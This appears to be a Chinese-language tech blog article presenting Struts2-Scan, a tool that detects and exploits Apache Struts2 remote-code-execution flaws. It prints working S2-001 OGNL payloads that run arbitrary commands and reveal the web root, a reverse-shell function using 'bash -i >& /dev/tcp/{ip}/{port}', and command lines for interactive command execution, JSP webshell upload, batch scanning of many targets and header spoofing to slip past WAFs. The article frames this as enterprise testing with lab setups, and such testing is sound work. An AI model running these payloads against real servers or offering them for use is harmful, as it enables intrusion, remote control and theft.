当前位置：首页 > news >正文

Struts2-Scan实战：企业级Struts2漏洞检测与利用完整方案

news 2026/5/7 14:57:49

Struts2-Scan实战：企业级Struts2漏洞检测与利用完整方案

【免费下载链接】Struts2-ScanStruts2全漏洞扫描利用工具项目地址: https://gitcode.com/gh_mirrors/st/Struts2-Scan

Struts2-Scan是一款功能强大的Struts2全漏洞扫描利用工具，能够帮助企业安全团队快速检测和验证Struts2系列高危漏洞。本文深入解析Struts2-Scan的技术实现、核心功能模块以及实战应用场景，为中级技术用户提供完整的漏洞检测解决方案。

技术问题背景与挑战

Struts2安全漏洞现状

Apache Struts2作为广泛使用的Java Web应用框架，历史上存在多个高危远程代码执行（RCE）漏洞，包括S2-001、S2-003、S2-005、S2-007、S2-008、S2-009、S2-012、S2-013、S2-015、S2-016、S2-019、S2-029、S2-032、S2-033、S2-037、S2-045、S2-046、S2-048、S2-052、S2-053、S2-devMode和S2-057等。这些漏洞影响范围广泛，从Struts 2.0.0到2.5.16的多个版本都存在安全隐患。

企业安全检测面临的挑战

漏洞种类繁多：Struts2漏洞涉及OGNL表达式注入、文件上传、参数处理等多个攻击面
检测复杂度高：不同漏洞需要不同的检测方法和payload构造
利用难度大：漏洞利用需要精确的payload编码和参数构造
批量检测效率低：传统手工检测无法满足大规模资产扫描需求

解决方案架构概述

Struts2-Scan整体架构

Struts2-Scan采用模块化设计，每个漏洞检测模块独立封装，支持灵活的扩展和定制。工具的核心架构包括：

Struts2-Scan架构层次： ├── 核心引擎层 │ ├── HTTP请求模块 │ ├── Payload生成器 │ ├── 结果解析器 │ └── 并发控制器 ├── 漏洞检测层 │ ├── S2-001检测模块 │ ├── S2-003检测模块 │ ├── S2-005检测模块 │ └── ...（共20+个模块） ├── 利用功能层 │ ├── 命令执行 │ ├── 文件上传 │ ├── 反弹Shell │ └── Web路径获取 └── 用户接口层 ├── CLI命令行接口 ├── 配置文件管理 └── 结果输出格式化

关键技术特性

多漏洞集成检测：支持20+个Struts2高危漏洞的一键检测
智能payload生成：自动根据漏洞类型生成合适的OGNL表达式
并发批量扫描：支持多进程并发处理，提升大规模扫描效率
灵活的参数配置：支持自定义HTTP头、代理、超时时间等
丰富的利用功能：支持命令执行、文件上传、反弹Shell等高级功能

核心功能模块详解

漏洞检测模块实现原理

每个漏洞检测模块都继承自统一的接口设计，核心检测逻辑基于OGNL表达式注入原理：

class S2_001: """S2-001漏洞检测利用类""" info = "[+] S2-001:影响版本Struts 2.0.0-2.0.8; POST请求发送数据; 默认参数为:username,password; 支持获取WEB路径,任意命令执行和反弹shell" check_poc = "%25%7B{num1}%2B{num2}%7D" web_path = "%25%7B%23req%3D%40org.apache.struts2.ServletActionContext%40getRequest()%2C%23response%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23response.println(%23req.getRealPath('%2F'))%2C%23response.flush()%2C%23response.close()%7D" exec_payload = "%25%7B%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B{cmd}%7D)).redirectErrorStream(true).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B50000%5D%2C%23d.read(%23e)%2C%23f%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22)%2C%23f.getWriter().println(new%20java.lang.String(%23e))%2C%23f.getWriter().flush()%2C%23f.getWriter().close()%7D" def check(self): """检测漏洞是否存在""" num1 = random.randint(10000, 100000) num2 = random.randint(10000, 100000) poc = self.check_poc.format(num1=num1, num2=num2) data = self.data.format(exp=poc) html = post(self.url, data, self.headers, self.encoding) nn = str(num1 + num2) if html.startswith("ERROR:"): return html elif nn in html: self.is_vul = True return 'S2-001' return self.is_vul

HTTP请求处理模块

工具内置了健壮的HTTP请求处理机制，支持GET/POST请求、代理配置、超时控制等功能：

def get(url, headers=None, encoding='UTF-8'): """GET请求发送包装""" try: html = requests.get(url, headers=headers, proxies=proxies, timeout=_tiemout) html = html.content.decode(encoding) return html.replace('\x00', '').strip() except ChunkedEncodingError as e: html = get_stream(url, headers, encoding) return html except ConnectionError as e: return "ERROR:" + "HTTP连接错误" except ConnectTimeout as e: return "ERROR:" + "HTTP连接超时错误" except Exception as e: return 'ERROR:' + str(e)

命令执行与Shell反弹机制

工具支持多种命令执行方式，包括直接执行、反弹Shell等：

def reverse_shell(self, ip, port): """反弹shell""" cmd = "bash -i >& /dev/tcp/{ip}/{port} 0>&1".format(ip=ip, port=port) cmd = base64.b64encode(cmd.encode()).decode() shell = self.shell.replace('SHELL', cmd) html = self.exec_cmd(shell) return html

配置与部署指南

环境安装与依赖配置

系统要求：

Python 3.6及以上版本
第三方库：click、requests、bs4
操作系统：支持Linux、Windows、macOS

安装步骤：

# 克隆项目仓库 git clone https://gitcode.com/gh_mirrors/st/Struts2-Scan # 进入项目目录 cd Struts2-Scan # 安装Python依赖 pip install click requests bs4 # 验证安装 python Struts2Scan.py --version

漏洞环境搭建

项目提供了完整的漏洞测试环境，使用Docker快速部署：

# 部署S2-045漏洞环境 docker pull medicean/vulapps:s_struts2_s2-045 docker run -d -p 8080:8080 medicean/vulapps:s_struts2_s2-045 # 部署S2-057漏洞环境 git clone https://github.com/vulhub/vulhub cd vulhub/struts2/s2-057 docker-compose up -d

工具参数详解

Struts2-Scan提供了丰富的命令行参数，支持灵活的配置：

参数	说明	示例
`-u, --url`	目标URL地址	`-u http://target.com/login.action`
`-n, --name`	指定漏洞名称	`-n S2_045`
`-f, --file`	批量扫描URL文件	`-f urls.txt`
`-d, --data`	POST参数，{exp}为payload占位符	`-d "username=admin&password={exp}"`
`-e, --exec`	进入命令执行交互模式	`-e`
`--webpath`	获取Web应用路径	`--webpath`
`-r, --reverse`	反弹Shell地址	`-r 192.168.1.100:4444`
`--upfile`	上传文件路径	`--upfile shell.jsp`
`--uppath`	上传目标路径	`--uppath /webapps/ROOT/shell.jsp`
`-p, --proxy`	HTTP代理	`-p http://127.0.0.1:8080`
`-t, --timeout`	HTTP超时时间	`-t 30`
`-w, --workers`	并发进程数	`-w 20`
`-q, --quiet`	只输出存在漏洞的结果	`-q`

实战应用场景

场景一：单目标全面漏洞检测

# 对单个URL进行全面漏洞扫描 python Struts2Scan.py -u http://192.168.1.100:8080/index.action # 输出结果示例 [*] http://192.168.1.100:8080/index.action 存在漏洞: S2-045 [*] http://192.168.1.100:8080/index.action 存在漏洞: S2-016 [*] http://192.168.1.100:8080/index.action 存在漏洞: S2-015

场景二：指定漏洞深度利用

# 针对S2-045漏洞进行命令执行 python Struts2Scan.py -u http://192.168.1.100:8080/index.action -n S2_045 -e # 获取Web应用路径 python Struts2Scan.py -u http://192.168.1.100:8080/index.action -n S2_045 --webpath # 上传WebShell python Struts2Scan.py -u http://192.168.1.100:8080/index.action -n S2_045 --upfile shell.jsp --uppath /usr/local/tomcat/webapps/ROOT/shell.jsp

场景三：批量资产扫描

# 创建目标URL列表文件 cat > targets.txt << EOF http://target1.com/login.action http://target2.com/index.action http://target3.com/admin.action EOF # 执行批量扫描 python Struts2Scan.py -f targets.txt -w 10 -t 20 -q

最佳实践与性能优化

扫描策略优化

智能超时设置：根据网络状况调整超时时间

# 内网环境使用较短超时 python Struts2Scan.py -u http://192.168.1.100:8080 -t 5 # 外网环境使用较长超时 python Struts2Scan.py -u http://example.com -t 30

并发控制优化：根据目标数量调整并发进程

# 少量目标使用默认并发 python Struts2Scan.py -f targets_small.txt -w 5 # 大量目标增加并发 python Struts2Scan.py -f targets_large.txt -w 20

漏洞检测准确性提升

参数自定义配置：针对特定应用调整POST参数

# 自定义POST参数格式 python Struts2Scan.py -u http://target.com/login -d "user={exp}&pass={exp}"

HTTP头定制：绕过WAF或特定防护

# 添加自定义HTTP头 python Struts2Scan.py -u http://target.com --header "User-Agent=Mozilla/5.0&X-Forwarded-For=127.0.0.1"

漏洞利用成功率提升

多Payload尝试：部分漏洞支持多种payload格式

# S2-005漏洞的双payload检测机制 def check(self): """选择可以利用成功的payload""" self.exec_payload = self.exec_payload1 html = echo_check(self) if html: return 'S2-005' else: self.exec_payload = self.exec_payload2 html = echo_check(self) if html: return 'S2-005'

编码格式适配：自动处理URL编码和字符转义

# Payload自动编码处理 cmd = parse_cmd(cmd) data = self.data.format(exp=self.exec_payload.format(cmd=quote(cmd)))

故障排查与监控

常见错误处理

错误类型	可能原因	解决方案
连接超时	网络问题或目标不可达	增加超时时间，检查网络连接
编码错误	目标页面编码不匹配	使用`-c`参数指定正确编码
无漏洞结果	目标不存在漏洞	验证目标是否为Struts2应用
权限不足	文件上传失败	检查目标目录权限，尝试其他路径

调试与日志分析

启用详细输出：关闭-q参数查看所有检测过程

代理调试：使用Burp Suite等工具监控HTTP流量

python Struts2Scan.py -u http://target.com -p http://127.0.0.1:8080

性能监控指标

扫描速度：每秒处理的URL数量
内存使用：监控Python进程内存消耗
网络带宽：扫描过程中的网络流量
成功率：漏洞检测准确率统计

扩展与二次开发

自定义漏洞检测模块

开发者可以基于现有框架添加新的漏洞检测模块：

class S2_Custom: """自定义漏洞检测类""" info = "[+] 自定义漏洞描述" check_poc = "自定义检测payload" def __init__(self, url, data=None, headers=None, encoding="UTF-8"): self.url = url self.headers = parse_headers(headers) self.encoding = encoding self.is_vul = False def check(self): """实现自定义检测逻辑""" # 检测逻辑实现 pass def exec_cmd(self, cmd): """实现命令执行功能""" # 命令执行逻辑 pass

集成到自动化扫描系统

Struts2-Scan可以集成到现有的安全扫描平台：

# 集成示例代码 from Struts2Scan import scan_single_url, scan_batch_urls class SecurityScanner: def __init__(self): self.scanner = Struts2Scan() def scan_target(self, target_url): """集成扫描功能""" results = scan_single_url(target_url) return self.analyze_results(results) def analyze_results(self, results): """结果分析处理""" vulnerabilities = [] for result in results: if result['vulnerable']: vulnerabilities.append({ 'url': result['url'], 'vuln': result['vuln_name'], 'severity': self.get_severity(result['vuln_name']) }) return vulnerabilities

插件化扩展架构

未来版本计划支持插件化架构：

插件化架构设计： ├── 核心引擎 ├── 插件管理器 ├── 漏洞检测插件 │ ├── struts2_detector.py │ ├── spring_detector.py │ └── shiro_detector.py ├── 利用插件 │ ├── command_executor.py │ ├── file_uploader.py │ └── reverse_shell.py └── 输出插件 ├── json_exporter.py ├── html_reporter.py └── csv_exporter.py